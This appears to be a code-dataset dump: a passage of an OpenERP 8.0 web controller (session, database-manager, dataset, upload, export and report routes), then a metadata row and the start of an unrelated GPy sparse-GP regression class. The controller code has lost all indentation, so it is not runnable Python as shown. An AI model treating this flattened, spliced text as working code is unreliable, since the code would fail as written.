messages = ir_translation.search_read(request.cr, uid, [('module','in',mods),('lang','=',lang),
('comments','like','openerp-web'),('value','!=',False),
('value','!=','')],
['module','src','value','lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod,{'messages':[]})
translations_per_module[mod]['messages'].extend({'id': m['src'],
'string': m['value']} \
for m in msg_group)
return {"modules": translations_per_module,
"lang_parameters": lang_params}
@http.route('/web/webclient/version_info', type='json', auth="none")
def version_info(self):
return openerp.service.common.exp_version()
class Proxy(http.Controller):
@http.route('/web/proxy/load', type='json', auth="none")
def load(self, path):
""" Proxies an HTTP request through a JSON request.
        It is strongly recommended not to request binary files through this,
as the result will be a binary data blob as well.
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
return Client(request.httprequest.app, BaseResponse).get(path).data
class Database(http.Controller):
@http.route('/web/database/selector', type='http', auth="none")
def selector(self, **kw):
try:
dbs = http.db_list()
if not dbs:
return http.local_redirect('/web/database/manager')
except openerp.exceptions.AccessDenied:
dbs = False
return env.get_template("database_selector.html").render({
'databases': dbs,
'debug': request.debug,
})
@http.route('/web/database/manager', type='http', auth="none")
def manager(self, **kw):
# TODO: migrate the webclient's database manager to server side views
request.session.logout()
js = "\n ".join('<script type="text/javascript" src="%s"></script>' % i for i in manifest_list('js', debug=request.debug))
css = "\n ".join('<link rel="stylesheet" href="%s">' % i for i in manifest_list('css', debug=request.debug))
r = html_template % {
'js': js,
'css': css,
'modules': simplejson.dumps(module_boot()),
'init': """
var wc = new s.web.WebClient(null, { action: 'database_manager' });
wc.appendTo($(document.body));
"""
}
return r
@http.route('/web/database/get_list', type='json', auth="none")
def get_list(self):
# TODO change js to avoid calling this method if in monodb mode
try:
return http.db_list()
except openerp.exceptions.AccessDenied:
monodb = db_monodb()
if monodb:
return [monodb]
raise
@http.route('/web/database/create', type='json', auth="none")
def create(self, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
db_created = request.session.proxy("db").create_database(
params['super_admin_pwd'],
params['db_name'],
bool(params.get('demo_data')),
params['db_lang'],
params['create_admin_pwd'])
if db_created:
request.session.authenticate(params['db_name'], 'admin', params['create_admin_pwd'])
return db_created
@http.route('/web/database/duplicate', type='json', auth="none")
def duplicate(self, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
duplicate_attrs = (
params['super_admin_pwd'],
params['db_original_name'],
params['db_name'],
)
return request.session.proxy("db").duplicate_database(*duplicate_attrs)
@http.route('/web/database/drop', type='json', auth="none")
def drop(self, fields):
password, db = operator.itemgetter(
'drop_pwd', 'drop_db')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
if request.session.proxy("db").drop(password, db):
return True
else:
return False
except openerp.exceptions.AccessDenied:
return {'error': 'AccessDenied', 'title': 'Drop Database'}
except Exception:
return {'error': _('Could not drop database !'), 'title': _('Drop Database')}
@http.route('/web/database/backup', type='http', auth="none")
def backup(self, backup_db, backup_pwd, token):
try:
db_dump = base64.b64decode(
request.session.proxy("db").dump(backup_pwd, backup_db))
filename = "%(db)s_%(timestamp)s.dump" % {
'db': backup_db,
'timestamp': datetime.datetime.utcnow().strftime(
"%Y-%m-%d_%H-%M-%SZ")
}
return request.make_response(db_dump,
[('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename))],
{'fileToken': token}
)
        except Exception as e:
return simplejson.dumps([[],[{'error': openerp.tools.ustr(e), 'title': _('Backup Database')}]])
@http.route('/web/database/restore', type='http', auth="none")
def restore(self, db_file, restore_pwd, new_db):
try:
data = base64.b64encode(db_file.read())
request.session.proxy("db").restore(restore_pwd, new_db, data)
return ''
        except openerp.exceptions.AccessDenied:
            raise Exception("AccessDenied")
@http.route('/web/database/change_password', type='json', auth="none")
def change_password(self, fields):
old_password, new_password = operator.itemgetter(
'old_pwd', 'new_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
return request.session.proxy("db").change_admin_password(old_password, new_password)
except openerp.exceptions.AccessDenied:
return {'error': 'AccessDenied', 'title': _('Change Password')}
except Exception:
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
class Session(http.Controller):
def session_info(self):
request.session.ensure_valid()
return {
"session_id": request.session_id,
"uid": request.session.uid,
"user_context": request.session.get_context() if request.session.uid else {},
"db": request.session.db,
"username": request.session.login,
}
@http.route('/web/session/get_session_info', type='json', auth="none")
def get_session_info(self):
request.uid = request.session.uid
request.disable_db = False
return self.session_info()
@http.route('/web/session/authenticate', type='json', auth="none")
def authenticate(self, db, login, password, base_location=None):
request.session.authenticate(db, login, password)
return self.session_info()
@http.route('/web/session/change_password', type='json', auth="user")
def change_password(self, fields):
old_password, new_password,confirm_password = operator.itemgetter('old_pwd', 'new_password','confirm_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
return {'error':_('You cannot leave any password empty.'),'title': _('Change Password')}
if new_password != confirm_password:
return {'error': _('The new password and its confirmation must be identical.'),'title': _('Change Password')}
try:
if request.session.model('res.users').change_password(
old_password, new_password):
return {'new_password':new_password}
except Exception:
return {'error': _('The old password you provided is incorrect, your password was not changed.'), 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
@http.route('/web/session/get_lang_list', type='json', auth="none")
def get_lang_list(self):
try:
return request.session.proxy("db").list_lang() or []
        except Exception as e:
return {"error": e, "title": _("Languages")}
@http.route('/web/session/modules', type='json', auth="user")
def modules(self):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed()
@http.route('/web/session/save_session_action', type='json', auth="user")
def save_session_action(self, the_action):
"""
        This method stores an action object in the session and returns an integer
identifying that action. The method get_session_action() can be used to get
back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
saved_actions = request.httpsession.get('saved_actions')
if not saved_actions:
saved_actions = {"next":1, "actions":{}}
request.httpsession['saved_actions'] = saved_actions
# we don't allow more than 10 stored actions
if len(saved_actions["actions"]) >= 10:
del saved_actions["actions"][min(saved_actions["actions"])]
key = saved_actions["next"]
saved_actions["actions"][key] = the_action
saved_actions["next"] = key + 1
request.httpsession['saved_actions'] = saved_actions
return key
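    # Illustrative round trip (values assumed):
    #   key = self.save_session_action({'type': 'ir.actions.act_window'})
    #   action = self.get_session_action(key)  # None once evicted (max 10 kept)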
@http.route('/web/session/get_session_action', type='json', auth="user")
def get_session_action(self, key):
"""
        Gets back a previously saved action. This method can return None if the
        action was saved too long ago and has been evicted (callers should
        handle that case gracefully).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
saved_actions = request.httpsession.get('saved_actions')
if not saved_actions:
return None
return saved_actions["actions"].get(key)
@http.route('/web/session/check', type='json', auth="user")
def check(self):
request.session.assert_valid()
return None
@http.route('/web/session/destroy', type='json', auth="user")
def destroy(self):
request.session.logout()
@http.route('/web/session/logout', type='http', auth="none")
def logout(self, redirect='/web'):
request.session.logout(keep_db=True)
return werkzeug.utils.redirect(redirect, 303)
class Menu(http.Controller):
@http.route('/web/menu/get_user_roots', type='json', auth="user")
def get_user_roots(self):
""" Return all root menu ids visible for the session user.
:return: the root menu ids
:rtype: list(int)
"""
s = request.session
Menus = s.model('ir.ui.menu')
# If a menu action is defined use its domain to get the root menu items
user_menu_id = s.model('res.users').read([s.uid], ['menu_id'],
request.context)[0]['menu_id']
menu_domain = [('parent_id', '=', False)]
if user_menu_id:
domain_string = s.model('ir.actions.act_window').read(
[user_menu_id[0]], ['domain'],request.context)[0]['domain']
if domain_string:
menu_domain = ast.literal_eval(domain_string)
return Menus.search(menu_domain, 0, False, False, request.context)
@http.route('/web/menu/load', type='json', auth="user")
def load(self):
""" Loads all menu items (all applications and their sub-menus).
:return: the menu root
:rtype: dict('children': menu_nodes)
"""
Menus = request.session.model('ir.ui.menu')
fields = ['name', 'sequence', 'parent_id', 'action']
menu_root_ids = self.get_user_roots()
menu_roots = Menus.read(menu_root_ids, fields, request.context) if menu_root_ids else []
menu_root = {
'id': False,
'name': 'root',
'parent_id': [-1, ''],
'children': menu_roots,
'all_menu_ids': menu_root_ids,
}
if not menu_roots:
return menu_root
        # menus are loaded fully, unlike a regular tree view, because there is
        # a limited number of items (752 when all 6.1 addons are installed)
menu_ids = Menus.search([('id', 'child_of', menu_root_ids)], 0, False, False, request.context)
menu_items = Menus.read(menu_ids, fields, request.context)
# adds roots at the end of the sequence, so that they will overwrite
# equivalent menu items from full menu read when put into id:item
# mapping, resulting in children being correctly set on the roots.
menu_items.extend(menu_roots)
menu_root['all_menu_ids'] = menu_ids # includes menu_root_ids!
# make a tree using parent_id
menu_items_map = dict(
(menu_item["id"], menu_item) for menu_item in menu_items)
for menu_item in menu_items:
if menu_item['parent_id']:
parent = menu_item['parent_id'][0]
else:
parent = False
if parent in menu_items_map:
menu_items_map[parent].setdefault(
'children', []).append(menu_item)
        # sort each node's children by sequence
for menu_item in menu_items:
menu_item.setdefault('children', []).sort(
key=operator.itemgetter('sequence'))
return menu_root
@http.route('/web/menu/load_needaction', type='json', auth="user")
def load_needaction(self, menu_ids):
""" Loads needaction counters for specific menu ids.
:return: needaction data
:rtype: dict(menu_id: {'needaction_enabled': boolean, 'needaction_counter': int})
"""
return request.session.model('ir.ui.menu').get_needaction_data(menu_ids, request.context)
class DataSet(http.Controller):
@http.route('/web/dataset/search_read', type='json', auth="user")
def search_read(self, model, fields=False, offset=0, limit=False, domain=None, sort=None):
return self.do_search_read(model, fields, offset, limit, domain, sort)
    def do_search_read(self, model, fields=False, offset=0, limit=False,
                       domain=None, sort=None):
""" Performs a search() followed by a read() (if needed) using the
provided search criteria
:param str model: the name of the model to search on
:param fields: a list of the fields to return in the result records
:type fields: [str]
:param int offset: from which index should the results start being returned
:param int limit: the maximum number of records to return
:param list domain: the search domain for the query
:param list sort: sorting directives
        :returns: A structure (dict) with two keys: ``length`` (the total
                  number of records matching the domain) and ``records``
                  (the paginated records matching the fields selection)
        :rtype: dict
"""
Model = request.session.model(model)
records = Model.search_read(domain, fields, offset or 0, limit or False, sort or False,
request.context)
if not records:
return {
'length': 0,
'records': []
}
if limit and len(records) == limit:
length = Model.search_count(domain, request.context)
else:
length = len(records) + (offset or 0)
return {
'length': length,
'records': records
}
@http.route('/web/dataset/load', type='json', auth="user")
def load(self, model, id, fields):
m = request.session.model(model)
value = {}
r = m.read([id], False, request.context)
if r:
value = r[0]
return {'value': value}
def call_common(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
def _call_kw(self, model, method, args, kwargs):
        # Temporarily implements the future display_name special field for model#read()
if method == 'read' and kwargs.get('context', {}).get('future_display_name'):
if 'display_name' in args[1]:
names = dict(request.session.model(model).name_get(args[0], **kwargs))
args[1].remove('display_name')
records = request.session.model(model).read(*args, **kwargs)
for record in records:
record['display_name'] = \
names.get(record['id']) or "%s#%d" % (model, (record['id']))
return records
if method.startswith('_'):
raise Exception("Access Denied: Underscore prefixed methods cannot be remotely called")
return getattr(request.registry.get(model), method)(request.cr, request.uid, *args, **kwargs)
@http.route('/web/dataset/call', type='json', auth="user")
def call(self, model, method, args, domain_id=None, context_id=None):
return self._call_kw(model, method, args, {})
@http.route(['/web/dataset/call_kw', '/web/dataset/call_kw/<path:path>'], type='json', auth="user")
def call_kw(self, model, method, args, kwargs, path=None):
return self._call_kw(model, method, args, kwargs)
@http.route('/web/dataset/call_button', type='json', auth="user")
def call_button(self, model, method, args, domain_id=None, context_id=None):
action = self._call_kw(model, method, args, {})
if isinstance(action, dict) and action.get('type') != '':
return clean_action(action)
return False
@http.route('/web/dataset/exec_workflow', type='json', auth="user")
def exec_workflow(self, model, id, signal):
return request.session.exec_workflow(model, id, signal)
@http.route('/web/dataset/resequence', type='json', auth="user")
def resequence(self, model, ids, field='sequence', offset=0):
""" Re-sequences a number of records in the model, by their ids
        The re-sequencing starts at the first record of ``ids``; the sequence
        number is incremented by one after each record, starting at ``offset``
:param ids: identifiers of the records to resequence, in the new sequence order
:type ids: list(id)
:param str field: field used for sequence specification, defaults to
"sequence"
:param int offset: sequence number for first record in ``ids``, allows
starting the resequencing from an arbitrary number,
defaults to ``0``
"""
m = request.session.model(model)
if not m.fields_get([field]):
return False
# python 2.6 has no start parameter
for i, id in enumerate(ids):
m.write(id, { field: i + offset })
return True
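    # e.g. (illustrative, model name assumed) resequence('my.model', [7, 3, 5],
    # offset=10) writes sequence 10 on record 7, 11 on record 3 and 12 on record 5.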
class View(http.Controller):
@http.route('/web/view/add_custom', type='json', auth="user")
def add_custom(self, view_id, arch):
CustomView = request.session.model('ir.ui.view.custom')
CustomView.create({
'user_id': request.session.uid,
'ref_id': view_id,
'arch': arch
}, request.context)
return {'result': True}
@http.route('/web/view/undo_custom', type='json', auth="user")
def undo_custom(self, view_id, reset=False):
CustomView = request.session.model('ir.ui.view.custom')
vcustom = CustomView.search([('user_id', '=', request.session.uid), ('ref_id' ,'=', view_id)],
0, False, False, request.context)
if vcustom:
if reset:
CustomView.unlink(vcustom, request.context)
else:
CustomView.unlink([vcustom[0]], request.context)
return {'result': True}
return {'result': False}
class TreeView(View):
@http.route('/web/treeview/action', type='json', auth="user")
def action(self, model, id):
return load_actions_from_ir_values(
'action', 'tree_but_open',[(model, id)],
False)
class Binary(http.Controller):
@http.route('/web/binary/image', type='http', auth="user")
def image(self, model, id, field, **kw):
last_update = '__last_update'
Model = request.session.model(model)
headers = [('Content-Type', 'image/png')]
etag = request.httprequest.headers.get('If-None-Match')
hashed_session = hashlib.md5(request.session_id).hexdigest()
retag = hashed_session
id = None if not id else simplejson.loads(id)
        if isinstance(id, list):
id = id[0] # m2o
try:
if etag:
if not id and hashed_session == etag:
return werkzeug.wrappers.Response(status=304)
else:
date = Model.read([id], [last_update], request.context)[0].get(last_update)
if hashlib.md5(date).hexdigest() == etag:
return werkzeug.wrappers.Response(status=304)
if not id:
res = Model.default_get([field], request.context).get(field)
image_base64 = res
else:
res = Model.read([id], [last_update, field], request.context)[0]
retag = hashlib.md5(res.get(last_update)).hexdigest()
image_base64 = res.get(field)
if kw.get('resize'):
resize = kw.get('resize').split(',')
if len(resize) == 2 and int(resize[0]) and int(resize[1]):
width = int(resize[0])
height = int(resize[1])
                    # cap the resize at 500x500
                    width = min(width, 500)
                    height = min(height, 500)
image_base64 = openerp.tools.image_resize_image(base64_source=image_base64, size=(width, height), encoding='base64', filetype='PNG')
image_data = base64.b64decode(image_base64)
except Exception:
image_data = self.placeholder()
headers.append(('ETag', retag))
headers.append(('Content-Length', len(image_data)))
try:
ncache = int(kw.get('cache'))
headers.append(('Cache-Control', 'no-cache' if ncache == 0 else 'max-age=%s' % (ncache)))
        except (TypeError, ValueError):
            # no or invalid 'cache' parameter
            pass
return request.make_response(image_data, headers)
def placeholder(self, image='placeholder.png'):
addons_path = http.addons_manifest['web']['addons_path']
return open(os.path.join(addons_path, 'web', 'static', 'src', 'img', image), 'rb').read()
@http.route('/web/binary/saveas', type='http', auth="user")
@serialize_exception
def saveas(self, model, field, id=None, filename_field=None, **kw):
""" Download link for files stored as binary fields.
If the ``id`` parameter is omitted, fetches the default value for the
binary field (via ``default_get``), otherwise fetches the field for
that precise record.
:param str model: name of the model to fetch the binary from
:param str field: binary field
:param str id: id of the record from which to fetch the binary
:param str filename_field: field holding the file's name, if any
:returns: :class:`werkzeug.wrappers.Response`
"""
Model = request.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if id:
res = Model.read([int(id)], fields, request.context)[0]
else:
res = Model.default_get(fields, request.context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
return request.not_found()
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return request.make_response(filecontent,
[('Content-Type', 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))])
@http.route('/web/binary/saveas_ajax', type='http', auth="user")
@serialize_exception
def saveas_ajax(self, data, token):
jdata = simplejson.loads(data)
model = jdata['model']
field = jdata['field']
data = jdata['data']
id = jdata.get('id', None)
filename_field = jdata.get('filename_field', None)
context = jdata.get('context', {})
Model = request.session.model(model)
fields = [field]
if filename_field:
fields.append(filename_field)
if data:
res = { field: data }
elif id:
res = Model.read([int(id)], fields, context)[0]
else:
res = Model.default_get(fields, context)
filecontent = base64.b64decode(res.get(field, ''))
if not filecontent:
raise ValueError(_("No content found for field '%s' on '%s:%s'") %
(field, model, id))
else:
filename = '%s_%s' % (model.replace('.', '_'), id)
if filename_field:
filename = res.get(filename_field, '') or filename
return request.make_response(filecontent,
headers=[('Content-Type', 'application/octet-stream'),
('Content-Disposition', content_disposition(filename))],
cookies={'fileToken': token})
@http.route('/web/binary/upload', type='http', auth="user")
@serialize_exception
def upload(self, callback, ufile):
# TODO: might be useful to have a configuration flag for max-length file uploads
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
data = ufile.read()
args = [len(data), ufile.filename,
ufile.content_type, base64.b64encode(data)]
        except Exception as e:
args = [False, e.message]
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@http.route('/web/binary/upload_attachment', type='http', auth="user")
@serialize_exception
def upload_attachment(self, callback, model, id, ufile):
Model = request.session.model('ir.attachment')
out = """<script language="javascript" type="text/javascript">
var win = window.top.window;
win.jQuery(win).trigger(%s, %s);
</script>"""
try:
attachment_id = Model.create({
'name': ufile.filename,
'datas': base64.encodestring(ufile.read()),
'datas_fname': ufile.filename,
'res_model': model,
'res_id': int(id)
}, request.context)
args = {
'filename': ufile.filename,
'id': attachment_id
}
except Exception:
args = {'error': "Something horrible happened"}
return out % (simplejson.dumps(callback), simplejson.dumps(args))
@http.route([
'/web/binary/company_logo',
'/logo',
'/logo.png',
], type='http', auth="none")
def company_logo(self, dbname=None):
# TODO add etag, refactor to use /image code for etag
uid = None
if request.session.db:
dbname = request.session.db
uid = request.session.uid
elif dbname is None:
dbname = db_monodb()
if not uid:
uid = openerp.SUPERUSER_ID
if not dbname:
image_data = self.placeholder('logo.png')
else:
try:
# create an empty registry
registry = openerp.modules.registry.Registry(dbname)
with registry.cursor() as cr:
cr.execute("""SELECT c.logo_web
FROM res_users u
LEFT JOIN res_company c
ON c.id = u.company_id
WHERE u.id = %s
""", (uid,))
row = cr.fetchone()
if row and row[0]:
image_data = str(row[0]).decode('base64')
else:
image_data = self.placeholder('nologo.png')
except Exception:
image_data = self.placeholder('logo.png')
headers = [
('Content-Type', 'image/png'),
('Content-Length', len(image_data)),
]
return request.make_response(image_data, headers)
class Action(http.Controller):
@http.route('/web/action/load', type='json', auth="user")
def load(self, action_id, do_not_eval=False):
Actions = request.session.model('ir.actions.actions')
value = False
try:
action_id = int(action_id)
except ValueError:
try:
module, xmlid = action_id.split('.', 1)
model, action_id = request.session.model('ir.model.data').get_object_reference(module, xmlid)
assert model.startswith('ir.actions.')
except Exception:
action_id = 0 # force failed read
base_action = Actions.read([action_id], ['type'], request.context)
if base_action:
ctx = {}
action_type = base_action[0]['type']
if action_type == 'ir.actions.report.xml':
ctx.update({'bin_size': True})
ctx.update(request.context)
action = request.session.model(action_type).read([action_id], False, ctx)
if action:
value = clean_action(action[0])
return value
@http.route('/web/action/run', type='json', auth="user")
def run(self, action_id):
return_action = request.session.model('ir.actions.server').run(
[action_id], request.context)
if return_action:
return clean_action(return_action)
else:
return False
class Export(http.Controller):
@http.route('/web/export/formats', type='json', auth="user")
def formats(self):
""" Returns all valid export formats
:returns: for each export format, a pair of identifier and printable name
:rtype: [(str, str)]
"""
return [
{'tag': 'csv', 'label': 'CSV'},
{'tag': 'xls', 'label': 'Excel', 'error': None if xlwt else "XLWT required"},
]
def fields_get(self, model):
Model = request.session.model(model)
fields = Model.fields_get(False, request.context)
return fields
@http.route('/web/export/get_fields', type='json', auth="user")
    def get_fields(self, model, prefix='', parent_name='',
                   import_compat=True, parent_field_type=None,
                   exclude=None):
if import_compat and parent_field_type == "many2one":
fields = {}
else:
fields = self.fields_get(model)
if import_compat:
fields.pop('id', None)
else:
fields['.id'] = fields.pop('id', {'string': 'ID'})
fields_sequence = sorted(fields.iteritems(),
key=lambda field: field[1].get('string', ''))
records = []
for field_name, field in fields_sequence:
if import_compat:
if exclude and field_name in exclude:
continue
if field.get('readonly'):
# If none of the field's states unsets readonly, skip the field
if all(dict(attrs).get('readonly', True)
for attrs in field.get('states', {}).values()):
continue
if not field.get('exportable', True):
continue
            id = prefix + (prefix and '/' or '') + field_name
name = parent_name + (parent_name and '/' or '') + field['string']
record = {'id': id, 'string': name,
'value': id, 'children': False,
'field_type': field.get('type'),
'required': field.get('required'),
'relation_field': field.get('relation_field')}
records.append(record)
if len(name.split('/')) < 3 and 'relation' in field:
ref = field.pop('relation')
record['value'] += '/id'
record['params'] = {'model': ref, 'prefix': id, 'name': name}
if not import_compat or field['type'] == 'one2many':
# m2m field in import_compat is childless
record['children'] = True
return records
@http.route('/web/export/namelist', type='json', auth="user")
def namelist(self, model, export_id):
# TODO: namelist really has no reason to be in Python (although itertools.groupby helps)
export = request.session.model("ir.exports").read([export_id])[0]
export_fields_list = request.session.model("ir.exports.line").read(
export['export_fields'])
fields_data = self.fields_info(
model, map(operator.itemgetter('name'), export_fields_list))
return [
{'name': field_name, 'label': fields_data[field_name]}
for field_name in fields_data.keys()
]
def fields_info(self, model, export_fields):
info = {}
fields = self.fields_get(model)
if ".id" in export_fields:
fields['.id'] = fields.pop('id', {'string': 'ID'})
# To make fields retrieval more efficient, fetch all sub-fields of a
# given field at the same time. Because the order in the export list is
# arbitrary, this requires ordering all sub-fields of a given field
# together so they can be fetched at the same time
#
# Works the following way:
# * sort the list of fields to export, the default sorting order will
# put the field itself (if present, for xmlid) and all of its
# sub-fields right after it
        # * then, group on: the first field of the path (which is the same for
        #   a field and for its sub-fields) and the length of splitting on the
        #   first '/', which basically means grouping the field on one side and
        #   all of the subfields on the other. This way, we have the field (for
        #   the xmlid) with length 1, and all of the subfields with the same
        #   base but a length "flag" of 2
# * if we have a normal field (length 1), just add it to the info
# mapping (with its string) as-is
# * otherwise, recursively call fields_info via graft_subfields.
# all graft_subfields does is take the result of fields_info (on the
# field's model) and prepend the current base (current field), which
# rebuilds the whole sub-tree for the field
#
# result: because we're not fetching the fields_get for half the
# database models, fetching a namelist with a dozen fields (including
# relational data) falls from ~6s to ~300ms (on the leads model).
# export lists with no sub-fields (e.g. import_compatible lists with
# no o2m) are even more efficient (from the same 6s to ~170ms, as
# there's a single fields_get to execute)
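        # Illustrative example (field names assumed): exporting
        #   ['name', 'partner_id/id', 'partner_id/name']
        # groups into ('name', 1) -> ['name'] (a plain field) and
        # ('partner_id', 2) -> ['partner_id/id', 'partner_id/name'],
        # which is grafted recursively on the partner model.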
for (base, length), subfields in itertools.groupby(
sorted(export_fields),
lambda field: (field.split('/', 1)[0], len(field.split('/', 1)))):
subfields = list(subfields)
if length == 2:
# subfields is a seq of $base/*rest, and not loaded yet
info.update(self.graft_subfields(
fields[base]['relation'], base, fields[base]['string'],
subfields
))
elif base in fields:
info[base] = fields[base]['string']
return info
def graft_subfields(self, model, prefix, prefix_string, fields):
export_fields = [field.split('/', 1)[1] for field in fields]
return (
(prefix + '/' + k, prefix_string + '/' + v)
for k, v in self.fields_info(model, export_fields).iteritems())
class ExportFormat(object):
@property
def content_type(self):
""" Provides the format's content type """
raise NotImplementedError()
def filename(self, base):
""" Creates a valid filename for the format (with extension) from the
        provided base name (extension-less)
"""
raise NotImplementedError()
def from_data(self, fields, rows):
""" Conversion method from OpenERP's export data to whatever the
current export class outputs
        :param list fields: a list of fields to export
        :param list rows: a list of records to export
:returns:
:rtype: bytes
"""
raise NotImplementedError()
def base(self, data, token):
model, fields, ids, domain, import_compat = \
operator.itemgetter('model', 'fields', 'ids', 'domain',
'import_compat')(
simplejson.loads(data))
Model = request.session.model(model)
ids = ids or Model.search(domain, 0, False, False, request.context)
field_names = map(operator.itemgetter('name'), fields)
import_data = Model.export_data(ids, field_names, request.context).get('datas',[])
if import_compat:
columns_headers = field_names
else:
columns_headers = [val['label'].strip() for val in fields]
return request.make_response(self.from_data(columns_headers, import_data),
headers=[('Content-Disposition',
content_disposition(self.filename(model))),
('Content-Type', self.content_type)],
cookies={'fileToken': token})
class CSVExport(ExportFormat, http.Controller):
@http.route('/web/export/csv', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'text/csv;charset=utf8'
def filename(self, base):
return base + '.csv'
def from_data(self, fields, rows):
fp = StringIO()
writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
writer.writerow([name.encode('utf-8') for name in fields])
for data in rows:
row = []
for d in data:
if isinstance(d, basestring):
d = d.replace('\n',' ').replace('\t',' ')
try:
d = d.encode('utf-8')
except UnicodeError:
pass
if d is False: d = None
row.append(d)
writer.writerow(row)
fp.seek(0)
data = fp.read()
fp.close()
return data
class ExcelExport(ExportFormat, http.Controller):
@http.route('/web/export/xls', type='http', auth="user")
@serialize_exception
def index(self, data, token):
return self.base(data, token)
@property
def content_type(self):
return 'application/vnd.ms-excel'
def filename(self, base):
return base + '.xls'
def from_data(self, fields, rows):
workbook = xlwt.Workbook()
worksheet = workbook.add_sheet('Sheet 1')
for i, fieldname in enumerate(fields):
worksheet.write(0, i, fieldname)
worksheet.col(i).width = 8000 # around 220 pixels
style = xlwt.easyxf('align: wrap yes')
for row_index, row in enumerate(rows):
for cell_index, cell_value in enumerate(row):
if isinstance(cell_value, basestring):
cell_value = re.sub("\r", " ", cell_value)
if cell_value is False: cell_value = None
worksheet.write(row_index + 1, cell_index, cell_value, style)
fp = StringIO()
workbook.save(fp)
fp.seek(0)
data = fp.read()
fp.close()
return data
class Reports(http.Controller):
POLLING_DELAY = 0.25
TYPES_MAPPING = {
'doc': 'application/vnd.ms-word',
'html': 'text/html',
'odt': 'application/vnd.oasis.opendocument.text',
'pdf': 'application/pdf',
'sxw': 'application/vnd.sun.xml.writer',
'xls': 'application/vnd.ms-excel',
}
@http.route('/web/report', type='http', auth="user")
@serialize_exception
def index(self, action, token):
action = simplejson.loads(action)
report_srv = request.session.proxy("report")
context = dict(request.context)
context.update(action["context"])
report_data = {}
report_ids = context.get("active_ids", None)
if 'report_type' in action:
report_data['report_type'] = action['report_type']
if 'datas' in action:
if 'ids' in action['datas']:
report_ids = action['datas'].pop('ids')
report_data.update(action['datas'])
report_id = report_srv.report(
request.session.db, request.session.uid, request.session.password,
action["report_name"], report_ids,
report_data, context)
report_struct = None
while True:
report_struct = report_srv.report_get(
request.session.db, request.session.uid, request.session.password, report_id)
if report_struct["state"]:
break
time.sleep(self.POLLING_DELAY)
report = base64.b64decode(report_struct['result'])
if report_struct.get('code') == 'zlib':
report = zlib.decompress(report)
report_mimetype = self.TYPES_MAPPING.get(
report_struct['format'], 'octet-stream')
file_name = action.get('name', 'report')
if 'name' not in action:
reports = request.session.model('ir.actions.report.xml')
res_id = reports.search([('report_name', '=', action['report_name']),],
0, False, False, context)
if len(res_id) > 0:
file_name = reports.read(res_id[0], ['name'], context)['name']
else:
file_name = action['report_name']
file_name = '%s.%s' % (file_name, report_struct['format'])
return request.make_response(report,
headers=[
('Content-Disposition', content_disposition(file_name)),
('Content-Type', report_mimetype),
('Content-Length', len(report))],
cookies={'fileToken': token})
class Apps(http.Controller):
@http.route('/apps/<app>', auth='user')
def get_app_url(self, req, app):
act_window_obj = request.session.model('ir.actions.act_window')
ir_model_data = request.session.model('ir.model.data')
try:
action_id = ir_model_data.get_object_reference('base', 'open_module_tree')[1]
action = act_window_obj.read(action_id, ['name', 'type', 'res_model', 'view_mode', 'view_type', 'context', 'views', 'domain'])
action['target'] = 'current'
except ValueError:
action = False
try:
app_id = ir_model_data.get_object_reference('base', 'module_%s' % app)[1]
except ValueError:
app_id = False
if action and app_id:
action['res_id'] = app_id
action['view_mode'] = 'form'
action['views'] = [(False, u'form')]
sakey = Session().save_session_action(action)
debug = '?debug' if req.debug else ''
return werkzeug.utils.redirect('/web{0}#sa={1}'.format(debug, sakey))
# vim:expandtab:tabstop=4:softtabstop=4:shiftwidth=4:
| trabacus-softapps/openerp-8.0-cc | openerp/addons/web/controllers/main.py | Python | agpl-3.0 | 74,305 | ["VisIt"] | f891b4a97c81aac9ccd0d7c41a1c921fff636ef69f8dbffab1fbcd67004a6081 |
# Copyright (c) 2017, Zhenwen Dai
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
from ..core.sparse_gp_mpi import SparseGP_MPI
from .. import likelihoods
from .. import kern
from ..inference.latent_function_inference.vardtc_md import VarDTC_MD
from GPy.core.parameterization.variational import NormalPosterior
class SparseGPRegressionMD(SparseGP_MPI):
"""Sparse Gaussian Process Regression with Missing Data
    This model targets the use case in which there are multiple
output dimensions (different dimensions are assumed to be
independent following the same GP prior) and each output dimension
is observed at a different set of inputs. The model takes a
    different data format: the input and output observations of all
    the output dimensions are stacked together correspondingly into
two matrices. An extra array is used to indicate the index of
output dimension for each data point. The output dimensions are
indexed using integers from 0 to D-1 assuming there are D output
dimensions.
:param X: input observations.
:type X: numpy.ndarray
:param Y: output observations, each column corresponding to an output dimension.
:type Y: numpy.ndarray
:param indexD: the array containing the index of output dimension for each data point
:type indexD: numpy.ndarray
:param kernel: a GPy kernel for GP of individual output dimensions ** defaults to RBF **
:type kernel: GPy.kern.Kern or None
:param Z: inducing inputs
:type Z: numpy.ndarray or None
    :param num_inducing: the number of inducing inputs (used to pick a random
        subset of X when Z is not supplied; defaults to 10)
    :type num_inducing: int
    :param bool individual_Y_noise: whether each output dimension has its own noise variance
:param str name: the name of the model
"""
